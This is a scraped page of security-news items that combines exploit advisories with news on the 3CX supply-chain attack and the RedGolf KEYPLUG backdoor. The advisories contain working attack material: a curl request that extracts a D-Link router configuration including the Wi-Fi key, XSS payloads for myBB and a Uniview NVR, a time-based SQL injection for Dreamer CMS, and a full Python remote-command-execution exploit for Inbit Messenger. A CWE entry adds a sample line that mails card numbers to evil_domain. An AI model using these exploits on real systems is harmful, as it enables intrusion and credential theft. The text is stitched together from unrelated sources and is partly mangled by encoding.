DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

    # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure# Date:  2022-11-10# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.dlink.com# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09# Firmware Version: ME_1.00# Tested on: Windows 11# [ Details - DSL-124 ]:#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.# [ Description ]:#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,#and in response to sending this request, she receives a complete backup of the router settings,#In fact this happens because of the lack of management of users and sessions in the network.# [ POC ]:Request :curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgiResponse :HTTP/1.1 200 OKConnection: closeServer: Virtual Web 0.9Content-Type: application/octet-stream;Content-Disposition: attachment;filename="config.img"Pragma: no-cacheCache-Control: no-cache<Config_Information_File_8671><V N="WLAN_WPA_PSK" V="pass@12345"/><V N="WLAN_WPA_PSK_FORMAT" V="0x0"/><V N="WLAN_WPA_REKEY_TIME" V=""/><V N="WLAN_ENABLE_1X" V="0x0"/><V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/><V N="WLAN_RS_IP" V="0.0.0.0"/>...</Config_Information_File_8671>

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

3CX DesktopApp through 18.12.416 has embedded malicious code, as exploited in the wild in March 2023. This affects versions 18.12.407 and 18.12.416 of the Electron Windows application shipped in Update 7, and versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 of the Electron macOS application.

Weakness ID: 506

Abstraction: Class  
Structure: Simple

 Description

The product contains code that appears to be malicious in nature.

 Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

 Relationships

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

 Relevant to the view "Research Concepts" (CWE-1000)

Nature

Type

ID

Name

ChildOf

Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

912

Hidden Functionality

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

507

Trojan Horse

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

510

Trapdoor

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

511

Logic/Time Bomb

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

512

Spyware

 Modes Of Introduction

The different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.

Phase

Note

Implementation

Bundling

Distribution

Installation

 Common Consequences

This table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Scope

Impact

Likelihood

Confidentiality  
Integrity  
Availability  

Technical Impact: _Execute Unauthorized Code or Commands_

 Demonstrative Examples

Example 1

In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.

(bad code)

Example Language: Java 

boolean authorizeCard(String ccn) {

_// Authorize credit card._

_..._

mailCardNumber(ccn, "evil\_developer@evil\_domain.com");

}

 Potential Mitigations

Phase: Testing

Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

 Detection Methods

Manual Static Analysis - Binary or Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies
    
*   Generated Code Inspection
    

Effectiveness: SOAR Partial

Dynamic Analysis with Manual Results Interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Automated Monitored Execution
    

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Manual Source Code Review (not inspections)
    

Effectiveness: SOAR Partial

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Origin Analysis
    

Effectiveness: SOAR Partial

 Memberships

This MemberOf Relationships table shows additional CWE Categories and Views that reference this weakness as a member. This information is often useful in understanding where a weakness fits within the context of external information sources.

Nature

Type

ID

Name

MemberOf

Category - a CWE entry that contains a set of other entries that share a common characteristic.

904

SFP Primary Cluster: Malware

 Notes

Terminology

The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson \[18\] to characterize a particular computer security threat; it has been redefined many times \[4,18-20\].

 Taxonomy Mappings

Mapped Taxonomy Name

Node ID

Fit

Mapped Node Name

Landwehr

Malicious

 Content History

More information is available — Please select a different filter.

CVE-2023-29059: CWE-506: Embedded Malicious Code (4.10)

Dreamer CMS version 4.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Dreamer CMS v4.0.0 - SQL Injection# Date: 2022/10/02 # Exploit Author: lvren# Vendor Homepage: http://cms.iteachyou.cc/# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip # Version: v4.0.0 # CVE: CVE-2022-43128Proof Of Concept:POST /admin/search/doSearch HTTP/1.1Host: localhost:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhost:8888Connection: closeReferer: http://localhost:8888/admin/search/doSearchCookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739Upgrade-Insecure-Requests: 1entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386lvrenlvren@lvre.ntesmail.com签名由 网易灵犀办公 定制

Dreamer CMS 4.0.0 SQL Injection

Uniview NVR301-04S2-P4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)# Author: Bleron Rrustemi# Discovery Date: 2022-11-15# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/# Datasheet:: https://www.uniview.com/download.do?id=1761643# Device Firmware: NVR-B3801.20.15.200829# Tested Version: NVR301-04S2-P4# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# CVE: N/A  # Proof of Concept:IP=IP of the devicehttp://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>

Uniview NVR301-04S2-P4 Cross Site Scripting

A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.
"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.
"The group has shown the ability to

Endpoint Security / Malware

A Chinese state-sponsored threat activity group tracked as **RedGolf** has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.

"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.

"The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families."

The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022.

Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG.

Both these campaigns were attributed to Winnti (aka APT41, Barium, Bronze Atlas, or Wicked Panda), which Recorded Future said "closely overlaps" with RedGolf.

"We have not observed specific victimology as part of the latest highlighted RedGolf activity," Recorded Future said. "However, we believe this activity is likely being conducted for intelligence purposes rather than financial gain due to the overlaps with previously reported cyberespionage campaigns."

The cybersecurity firm, in addition to detecting a cluster of KEYPLUG samples and operational infrastructure (codenamed GhostWolf) used by the hacking group from at least 2021 to 2023, noted its use of other tools like Cobalt Strike and PlugX.

The GhostWolf infrastructure, for its part, consists of 42 IP addresses that function as KEYPLUG command-and-control. The adversarial collective has also been observed utilizing a mixture of both traditionally registered domains and Dynamic DNS domains, often featuring a technology theme, to act as communication points for Cobalt Strike and PlugX.

"RedGolf will continue to demonstrate a high operational tempo and rapidly weaponize vulnerabilities in external-facing corporate appliances (VPNs, firewalls, mail servers, etc.) to gain initial access to target networks," the company said.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

"Additionally, the group will likely continue to adopt new custom malware families to add to existing tooling such as KEYPLUG."

To defend against RedGolf attacks, organizations are recommended to apply patches regularly, monitor access to external facing network devices, track and block identified command-and-control infrastructure, and configure intrusion detection or prevention systems to monitor for malware detections.

The findings come as Trend Micro revealed that it discovered more than 200 victims of Mustang Panda (aka Earth Preta) attacks as part of a far-reaching cyber espionage effort orchestrated by various sub-groups since 2022.

A majority of the cyber strikes have been detected in Asia, followed by Africa, Europe, the Middle East, Oceania, North America, and South America.

"There are strong indications of intertwined traditional intelligence tradecraft and cyber collection efforts, indicative of a highly coordinated and sophisticated cyber espionage operation," Trend Micro said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor

Inbit Messenger versions 4.6.0 through 4.9.0 suffer from an unauthenticated remote command execution vulnerability.

    # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)# Date: 11/08/2022# Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html# Version: v4.6.0 - v4.9.0# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md#!/usr/bin/env python3# -*- coding: utf-8 -*-import sys, socket, struct, string, argparse, loggingBANNER = """\033[0m\033[1;35m╔══════════════════════════════════════════════════════════════════════════╗║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝       \033[1;36m██║  ██║     ██║  ██║███████╗   ██║        \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m"""# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build numberTARGETS = {  4601 : 0x005f3360,  4801 : 0x005f7364,  4901 : 0x005f7364,}# NOTE: min and max values for length of commandCMD_MIN_LEN = 10CMD_MAX_LEN = 0xfc64# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflowBAD_BYTES = b"\x3e" # >def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:  # NOTE: send packet with client build number of 4601 for v4.6.0  pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"  logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  _d = s.recv(1024)  # find build tag in response  if b'<c>' not in _d:    logging.error(f"invalid version packet received: {_d}")    sys.exit(-1)  s.close()  try:    build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])  except:    logging.error(f"failed to parse build number from packet: {_d}")    sys.exit(-1)  # get the IAT offset   if build not in TARGETS.keys():    logging.error(f"unexpected build number: {build}")    sys.exit(-1)  # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'  winexec = struct.pack("<I", TARGETS[build] - 0x38)  logging.success(f"target build number is {build}")  logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")  # sanity check for bad bytes in WinExec address  for c in winexec:    if c in BAD_BYTES:      logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")      sys.exit(-1)  return winexecdef exploit(targetIp:str, targetPort:int, command:bytes) -> None:  # NOTE: command must be NULL terminated  command += b"\x00"  # check user command length  if len(command) < CMD_MIN_LEN:    logging.error(f"command length must be at least {CMD_MIN_LEN} characters")    sys.exit(-1)  if len(command) >= CMD_MAX_LEN:    logging.error(f"command length must be less than {CMD_MAX_LEN} characters")    sys.exit(-1)  # get WinExec address  winexec = getWinExecAddress(targetIp, targetPort)  # get a string representation of the length of the command data after the <> tag parsed by atol()  pktLen = str(len(command))  pkt  = b"<"            # start of XML tag/stack overflow  pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character  pkt += b"\x00"         # NULL terminator to force atol to ignore what comes next  # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()  pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite  pkt += winexec                           # indirect function pointer we control  pkt += b">"                              # end of XML tag/stack overflow  pkt += command                           # the command set to the call to WinExec()  logging.info(f"sending payload to {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  s.close()  logging.success("DONE")if __name__ == '__main__':  # parse arguments  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)  parser.add_argument('-t', '--target',  help='target IP',      type=str, required=True)  parser.add_argument('-c', '--command', help='command to run', type=str, required=True)  parser.add_argument('-p', '--port',    help='target port',    type=int, required=False, default=10883)  args = parser.parse_args()  # define logger  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')  logging.SUCCESS = logging.CRITICAL + 1  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)  # print banner  print(BANNER)  # run exploit  exploit(args.target, args.port, args.command.encode())

Inbit Messenger 4.9.0 Remote Command Execution

By Deeba Ahmed
According to cybersecurity researchers, a nation-state actor, LABYRINTH CHOLLIMA, is suspected to be behind the multi-stage attack on 3CXDesktopApp.
This is a post from HackRead.com Read the original post: Popular PABX platform, 3CX Desktop App suffers supply chain attack

SentinelOne has dubbed the attack “Smooth Operator,” while CrowdStrike suspects the involvement of a North Korean government-state actor known as LABYRINTH CHOLLIMA.

CrowdStrike and SentinelOne cybersecurity researchers identified an unusual spike in malicious activity from a single, legitimate binary, 3CX Voice Over Internet Protocol (VOIP) desktop App (3CX Desktop App).

**Campaign Details**

On March 29, 2023, CrowdStrike researchers observed malicious activity, including beaconing to attacker-operated infrastructure, deploying second-stage payloads, and, in some cases, hands-on keyboard activity.

Since the app is available for Windows, macOS, and Linux, the activity was observed on Mac and Windows systems. Mobile versions are also available for Android and iOS devices. For browsers, the app is available as an extension for Chrome, and a browser-based version is available for the Progressive Web app.

Researchers suspect the involvement of a North Korean government-state actor, LABYRINTH CHOLLIMA. CrowdStrike Intelligence sent an alert to its customers yesterday morning. On the other hand, SentinelOne started seeing an uptick in 3CX Desktop App behaviour on March 22, 2023.

It is worth mentioning that SentinelOne has dubbed the attack “Smooth Operator.” The company urges customers to ensure that prevention policies are appropriately configured and that Suspicious Processes are activated to stay protected.

**Multi-Stage Attack Scenario**

In this multi-stage attack, the malicious 3CX Desktop App installer serves as a shellcode loader that executes the shellcode from heap space and loads a DLL after removing the “MZ” at the start.

This DLL is later called through the DllGetClassObject export. At this stage, icon files are downloaded from a specific GitHub repository: (github.com/IconStorages/images).

These ICO files append Base64 data at the end, which is then decoded and used to download the final stage. In this stage, info-stealer functionality is implemented, which includes collecting system and browser data. It can collect data from Chrome, Brave, Edge, and Firefox browsers, and the collected data includes browsing history from Chrome and Places tab data from Firefox.

**What is 3CXDesktopApp**

For your information, 3CX Desktop App is a widely-used voice and video conferencing and call routing software characterized as a Private Automatic Branch Exchange (PABX) platform.

The platform is used by 600,000 companies globally and has more than 12 million active users. Companies in the automobile, manufacturing, hospitality, food & beverage, and MSP (managed information technology provider) sectors commonly use it.

It is worth noting that PBX software is an attractive target for launching supply-chain attacks, as these allow attackers to monitor organizations’ communications and alter call routing and broker connections into external voice services.

**UPDATE:**

In a subsequent update, 3CX stated that the problem seemed to stem from a bundled library that was compiled into the Windows Electron app via git, and the company is currently conducting further investigations into the matter.

1.  PyPI Packages Drop Malware in New Supply Chain Attack
2.  News Corp’s software supply chain attack & cybersecurity
3.  SolarWinds supply chain attack affected 250 organizations
4.  Access:7 Supply Chain Flaws Impact ATMs and IoT devices

Popular PABX platform, 3CX Desktop App suffers supply chain attack

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.
"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls

Supply Chain / Software Security

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.

"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said.

The cybersecurity firm is tracking the activity under the name **SmoothOperator**, stating the threat actor registered a massive attack infrastructure as far back as February 2022.

3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Express, BMW, Honda, Ikea, Pepsi, and Toyota, among others.

While the 3CX PBX client is available for multiple platforms, Sophos, citing telemetry data, pointed out that the attacks observed so far are confined to the Windows Electron client of the PBX phone system.

The infection chain, in a nutshell, takes advantage of the DLL side-loading technique to load a rogue DLL (ffmpeg.dll) that's designed to retrieve an icon file (ICO) payload. The GitHub repository hosting the file has since been taken down.

The information stealer is capable of gathering system information and sensitive data stored in Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox browsers.

Cybersecurity firm CrowdStrike said it suspects the attack to be linked to a North Korean nation-state actor it tracks as Labyrinth Chollima (aka Nickel Academy), a sub-cluster within the notorious Lazarus Group.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity," CrowdStrike added.

In a forum post, 3CX's CEO Nick Galea said it's in the process of issuing a new build over the next few hours, and noted that Android and iOS versions are not impacted. "Unfortunately this happened because of an upstream library we use became infected," Galea said, without specifying more details.

In the interim, the company is urging its customers to uninstall the app and install it again, or alternatively use the PWA client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Desktop App Targeted in Supply Chain Cyber Attack, Affecting Millions of Users

Categories: News
Tags: 3CX

Tags:  supply-chain

Tags:  sideload

Researchers have found that the 3CX desktop app may be compromised and used in supply chain attacks.



(Read more...)




The post 3CX desktop app used in a supply chain attack appeared first on Malwarebytes Labs.

Researchers have found that the 3CX desktop app may be compromised and used in supply chain attacks.

The 3CX Desktop App is a Voice over Internet Protocol (VoIP) type of application which is available for Windows, macOS, Linux and mobile. Many large corporations use it internally to make calls, view the status of colleagues, chat, host web conferences, and for voicemail. 3CX is a Private Branch Exchange (PBX) system, which is basically a private telephone network used within a company or organization.

The 3CX website boasts 600,000 customer companies with 12 million daily users, which might give you an idea of the possible impact a supply chain attack could have.

The discovered attack is very complex and probably has been going on for months. While attribution in these cases is always difficult, some fingers are pointing to North Korea. It is likely the attacks have been ongoing since one of the shared samples was digitally signed on March 3, 2023, with a legitimate 3CX Ltd certificate issued by DigiCert.

While it is almost certain that Windows Electron clients are affected, there is no evidence so far that any other platforms are. On the 3CX forums, users are being told that only the new version (3CX Desktop App) leads to the malware infection, because the 3CX Phone for Windows (the legacy version) is not based on the Electron Framework. Electron is an open source project that enables web developers to create desktop applications.

According to a 3CX spokesperson, this happened because of an upstream library it uses became infected.

The main executable is not malicious itself and can be downloaded from 3CX's website as part of an installation procedure or an update. The 3CXDesktopApp.exe executable, however, sideloads a malicious dynamic link library (DLL) called ffmpeg.dll.

The ffmpeg.dll in turn is used to extract an encrypted payload from d3dcompiler\_47.dll and execute it. The malware then downloads icon files hosted on GitHub that contain Base64 encoded strings appended to the end of the images, as shown below.

_Base64 strings embedded in ICO files (image courtesy of BleepingComputer)_

The d3dcompiler\_47.dll file has all the functionality of the legitimate version, with the payload appended. This warrants that it would alert users to the fact that something is wrong with their software.

While research is ongoing into the full payload, it is clear that a backdoor is created on affected systems.

**What needs to be done?**

After initially playing down the alerts on its user forums as a possible false positive, 3CX has now posted that it is working on an update.

The advice on the 3CX forums is to uninstall the app and then reinstall it, accompanied by a strong advice to install the PWA client instead.

Malwarebytes detects the malicious DDLs as Trojan.Agent.

We will keep you updated here, but as a user you might want to keep an eye on 3CX’s blog and forums to learn about new developments, and when an update is available.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#windows